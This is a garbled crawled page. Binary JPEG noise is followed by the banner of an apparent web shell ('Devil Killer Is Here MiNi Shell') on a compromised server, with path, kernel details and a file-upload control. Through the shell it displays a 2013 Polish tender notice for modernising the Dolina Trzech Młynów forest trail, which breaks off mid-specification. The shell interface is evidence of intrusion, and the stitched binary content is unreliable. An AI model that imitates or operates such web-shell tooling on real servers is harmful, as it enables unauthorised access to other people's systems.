JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130214/24055-N-2013.html

<p class="kh_header"><b>Bogdaniec: Modernizacja ścieżki dydaktycznej pn. Dolina Trzech Młynów w ramach projektu Budowa małej infrastruktury służącej zabezpieczeniu obszarów Natura 2000: Ostoja Witnicko-Dębniańska w Nadleśnictwie Bogdaniec, Pojezierze Myśliborskie, Dziczy Las, Dolina Tywy w Nadleśnictwie Myślibórz</b><br>
<b>Numer ogłoszenia: 24055 - 2013; data zamieszczenia: 14.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe reprezentujące Skarb Państwa Nadleśnictwo Bogdaniec , ul. Leśna 17, 66-450 Bogdaniec, woj. lubuskie, tel. 095 7284350 w. 0.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szczecin.lasy.gov.pl/bogdaniec</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ścieżki dydaktycznej pn. Dolina Trzech Młynów w ramach projektu Budowa małej infrastruktury służącej zabezpieczeniu obszarów Natura 2000: Ostoja Witnicko-Dębniańska w Nadleśnictwie Bogdaniec, Pojezierze Myśliborskie, Dziczy Las, Dolina Tywy w Nadleśnictwie Myślibórz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja istniejącej ścieżki dydaktycznej pod nazwą Dolina Trzech Młynów poprzez wykonanie utwardzenia gruntowej nawierzchni ścieżki za pomocą geokraty, wykonanie drewnianych balustrad, oznakowanie ścieżki poprzez wykonanie i montaż tablic edukacyjnych, informacyjnych i porządkowych oraz budowę małej infrastruktury ścieżki w postaci drewnianych szlabanów, drewnianych koszy na śmieci, wykonanie i montaż budek lęgowych, karmników oraz poideł dla ptaków.;
Budowa pomostu drewnianego z pochylnią umożliwiającą dostęp osobom poruszającym się na wózkach inwalidzkich w obrębie rowu Bogdanka..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.21.00-2, 45.21.40.00-0, 30.19.50.00-2, 45.23.31.41-9, 45.22.38.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie nr 1 - 3 000.00 zł (słownie: trzy tysiące 00/100)
Zadanie nr 2 - 700.00 zł (słownie: siedemset  00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr 1; 2:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie dokumentow wymaganych w niniejszej specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr 1:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia tj. wykażą, że wykonali w ciągu ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej jedną robotę budowlaną o charakterze zbliżonym do przedmiotu zamówienia t. j. jedną robotę budowlaną polegającą na budowie lub montażu obiektów drewnianych małej architektury o wartości co najmniej 50 000,00 zł brutto.

 Dla zadania częściowego nr 2:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia tj. wykażą, że wykonali w ciągu ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej jedną robotę budowlaną o charakterze zbliżonym do przedmiotu zamówienia t. j. jedną robotę budowlaną polegającą na wykonaniu budowli lub elementów budowli o konstrukcji drewnianej o wartości co najmniej 30 000,00 zł brutto.

Wykonawca który wykaże, że wykonał roboty budowlane opisane powyżej spełni warunek na wszystkie zadania częściowe.

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie dokumentow wymaganych w niniejszej specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr 1; 2:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. 
Brak szczególnych wymagań w tym zakresie.

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów wymaganych w niniejszej specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr 1; 2:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia.
Brak szczególnych wymagań w tym zakresie.

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów wymaganych w niniejszej specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr 1:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. 
Wykonawca ubiegający się o udzielenie zamówienia powinien wykazać, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 100.000,00 zł.

Dla zadania częściowego nr 2:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. 
Wykonawca ubiegający się o udzielenie zamówienia powinien wykazać, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 30.000,00 zł.

Wykonawca, który wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia 130.000,00 zł, spełni warunek na wszystkie zadania częściowe.

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie dokumentow wymaganych w niniejszej specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz oferty cenowej - sporządzony wg wzoru stanowiącego załączniki nr 4 i 5 do specyfikacji istotnych warunków zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecin.lasy.gov.pl/web/bogdaniec<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2013 godzina 09:00, miejsce: w siedzibie Zamawiającego pokój nr 9 (sekretariat I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja projektu - Budowa małej infrastruktury służącej zabezpieczeniu obszarów Natura 2000 : Ostoja Witnicko - Dębniańska w Nadleśnictwie Bogdaniec, Pojezierze Myśliborskie, Dziczy Las, Dolina Tywy w Nadleśnictwie Myślibórz.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja ścieżki dydaktycznej pn. Dolina Trzech Młynów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja istniejącej ścieżki dydaktycznej pod nazwą Dolina Trzech Młynów poprzez wykonanie utwardzenia gruntowej nawierzchni ścieżki za pomocą geokraty, wykonanie drewnianych balustrad, oznakowanie ścieżki poprzez wykonanie i montaż tablic edukacyjnych, informacyjnych i porządkowych oraz budowę małej infrastruktury ścieżki w postaci drewnianych szlabanów, drewnianych koszy na śmieci, wykonanie i montaż budek lęgowych, karmników oraz poideł dla ptaków.

1. Utwardzenie gruntowej nawierzchni ścieżki:
a) usunięcie korzeni i karpin,
b) mechaniczne wykonanie koryta o szerokości 1,5 m na odcinku długości 350 m,
c) wykonanie 10 cm warstwy odsączającej z piasku wraz z zagęszczeniem,
d) wykonanie 2,5 cm warstwy wyrównawczej z mieszanki grysowo-żwirowej
e) wykonanie obramowania ścieżki z kostki granitowej ułożonej na podsypce cementowo-piaskowej grubości 10 cm na odcinku długości 350 metrów (wg rysunku stanowiącego załącznik nr 21 do SIWZ),
f) wzmocnienie nawierzchni ścieżki o szerokości 1,5 m poprzez ułożenie  geokraty systemowej z połączeniami systemowymi (wg załącznika nr 22 do SIWZ),
g) Wymagania dla krat (geokrat):
- materiał - PE (polietylen) wysokociśnieniowy,
- barwa czarna - podstawowa (przez 1% zawartości pigmentu, stabilizowany UV),
- spadek wytrzymałości na ściskanie kratki w temperaturze 30o C względem wytrzymałości 2 Mpa nie więcej niż 30%,
- stabilność formy - odporność na temperatury od - 30 do + 85o C,
- zmienność formy - 0,5% (w temperaturze od +20 do +80 o C),
- nasiąkliwość 0,01%,
- oddziaływanie na środowisko - obojętne wg norm DIN 38412, odporne na promieniowanie UV i mróz,
- rozpuszczalność - odporna na działanie kwasów, ługów, alkoholi, olei i benzyny (posypywanie solą, amoniak, kwaśne deszcze itp.),
- wymiary kraty - 33 x 33 x 3 cm,
- cela kraty - 6 cm,
- grubość ścianki - 5 mm,
- wytrzymałość - 150 t/m2,
- kolor - czarny
h) wypełnienie ułożonej geokraty zasypką żwirową o drobnym uziarnieniu.

2. Oznakowanie ścieżki:

2.1. Wykonanie i montaż 4 sztuk poglądowych tablic edukacyjnych:
a) Wykonanie poglądowych tablic edukacyjnych na stelażu z drewna akacjowego lub dębowego wraz z daszkiem zabezpieczającym przed opadami atmosferycznymi wg rysunku stanowiącego załącznik nr 7 do SIWZ.
b) Opis plansz edukacyjnych:
- rozmiar planszy z treścią przeznaczoną do edukacji dostosować do wymiarów pola przeznaczonego na jej umieszczenie oraz umocować za pomocą drewnianych listew przymocowanych do stelaża,
- każda plansza edukacyjna musi być wykonana metodą druku solwentowego na podłożu z blachy ocynkowanej, musi być wykonana bardzo trwale oraz odporna na warunki atmosferyczne,
- plansze muszą zawierać tło, ilustracje oraz teksty dopasowane do tematu planszy, materiały tematyczne potrzebne do wykonania plansz (t. j. teksty, zdjęcia, grafiki) Wykonawca otrzyma od Zamawiającego na etapie realizacji, 
- Wykonawca po otrzymaniu od Zamawiającego odpowiednich materiałów tematycznych, przekaże je grafikowi w celu zaprojektowania formy graficznej każdej planszy.
- Wykonawca przedstawi Zamawiającemu projekty planszy w celu ustalenia ewentualnych poprawek lub akceptacji,
 - tablice zostaną rozmieszczone na ścieżce edukacyjnej Dolina Trzech Młynów znajdującej się na terenie Leśnictwa Motylewo, całkowita długość ścieżki wynosi 4,8 km.
c) Tablice wykonać wg wzoru, który stanowi rysunek będący załącznikiem nr 7 do SIWZ.
d) Wszystkie drewniane elementy tablic impregnowane w kolorze typu palisander.

2.2. Wykonanie i montaż 6 sztuk interaktywnych tablic edukacyjnych:
a) Wykonanie i montaż tablicy edukacyjnej na stelażu z drewna akacjowego lub dębowego wraz z daszkiem zabezpieczającym przed opadami atmosferycznymi, drewnianym korytkiem wypełnionym piaskiem oraz rzeźbionymi w drewnie sześcioma pieczątkami z tropami zwierząt. Tablice wykonać wg wzoru, który stanowi rysunek będący załącznikiem nr 8 do SIWZ.
b) Wykonanie i montaż tablicy edukacyjnej na stelażu z drewna akacjowego lub dębowego wraz z daszkiem zabezpieczającym przed opadami atmosferycznymi oraz drewnianą skrzynią podzieloną na 4 zamknięte komory posiadające zamykane otwory umożliwiające włożenie od góry ręki do środka. Dodatkowo każda komora kosza na frontowej ścianie musi posiadać otwór zabezpieczony gumą umożliwiający włożenie ręki od frontu. Tablice wykonać wg wzoru, który stanowi rysunek będący załącznikiem nr 9 do SIWZ.
c) Wykonanie i montaż tablicy edukacyjnej na stelażu z drewna akacjowego lub dębowego wraz z daszkiem zabezpieczającym przed opadami atmosferycznymi oraz czterema obracającymi się wokół własnej osi graniastosłupami trójkątnymi. Na trzech bokach każdego graniastosłupa należy wykonać treści oraz ilustracje związane tematycznie z treścią planszy umieszczonej powyżej nich. Tablice wykonać wg wzoru, który stanowi rysunek będący załącznikiem nr 10 do SIWZ.
d) Wykonanie i montaż tablicy edukacyjnej na stelażu z drewna akacjowego lub dębowego wraz z daszkiem zabezpieczającym przed opadami atmosferycznymi, zamontowanymi na planszy z tłem sześcioma budkami lęgowymi ptaków oraz zamontowaną w dolnej części stelaża tablicy listwą przeznaczoną do umieszczenia opisów zamontowanych powyżej budek lęgowych oraz ptaków w nich mieszkających.  Tablice wykonać wg wzoru, który stanowi rysunek będący załącznikiem nr 11 do SIWZ.
e) Wykonanie i montaż tablicy edukacyjnej na stelażu z drewna akacjowego lub dębowego wraz z daszkiem zabezpieczającym przed opadami atmosferycznymi, planszą składającą się z dziewięciu obracających się wokół własnej osi graniastosłupów trójkątnych oraz zamontowanymi poniżej nich wałkami przedstawiającymi strukturę wewnętrzną drzewa.  Na trzech bokach każdego graniastosłupa należy wykonać treści oraz ilustracje. Tablice wykonać wg wzoru, który stanowi rysunek będący załącznikiem nr 12 do SIWZ.
f) Wykonanie i montaż tablicy edukacyjnej na stelażu z drewna akacjowego lub dębowego wraz z daszkiem zabezpieczającym przed opadami atmosferycznymi oraz imitacją rozłożonych skrzydeł ptaka drapieżnego. Na imitacji skrzydeł należy wyrzeźbić miarę oraz zaznaczyć szerokość rozłożonych skrzydeł dla sześciu ptaków drapieżnych. Tablice wykonać wg wzoru, który stanowi rysunek będący załącznikiem nr 13 do SIWZ.

Opis plansz edukacyjnych:
- rozmiar planszy z treścią przeznaczoną do edukacji dostosować do wymiarów pola przeznaczonego na jej umieszczenie, 
- plansze umocować za pomocą drewnianych listew przymocowanych do stelaża,
- plansze umieszczane na bokach graniastosłupów trójkątnych mocować za pomocą kleju,
- każda plansza edukacyjna musi być wykonana metodą druku solwentowego na podłożu z blachy ocynkowanej, musi być wykonana bardzo trwale oraz odporna na warunki atmosferyczne,
- plansze muszą zawierać tło, ilustracje oraz teksty dopasowane do tematu planszy, materiały tematyczne potrzebne do wykonania plansz (t. j. teksty, zdjęcia, grafiki) Wykonawca otrzyma od Zamawiającego na etapie realizacji,
- Wykonawca po otrzymaniu od Zamawiającego odpowiednich materiałów tematycznych, przekaże je grafikowi w celu zaprojektowania formy graficznej każdej planszy.
- Wykonawca przedstawi Zamawiającemu projekty planszy w celu ustalenia ewentualnych poprawek lub akceptacji,

Tablice zostaną rozmieszczone na ścieżce edukacyjnej Dolina Trzech Młynów znajdującej się na terenie Leśnictwa Motylewo, całkowita długość ścieżki wynosi 4,8 km.
Wszystkie drewniane elementy tablic impregnowane w kolorze typu palisander.

2.3. Wykonanie i montaż 1 sztuki drewnianej tablicy informacyjnej na stopach fundamentowych  z daszkiem pokrytym gontem bitumicznym koloru czerwonego na deskowaniu:
a) wymiary stelaża:
- wysokość: 310 cm
- długość z daszkiem: 260 cm
- szerokość z dachem: 100 cm
- szerokość bez dachu: 50 cm

b)  wymiary pola przeznaczonego na planszę informacyjną:
- wysokość: 150 cm,
- szerokość: 100 cm,

c) stopy fundamentowe:
- szerokość: 70 x 70
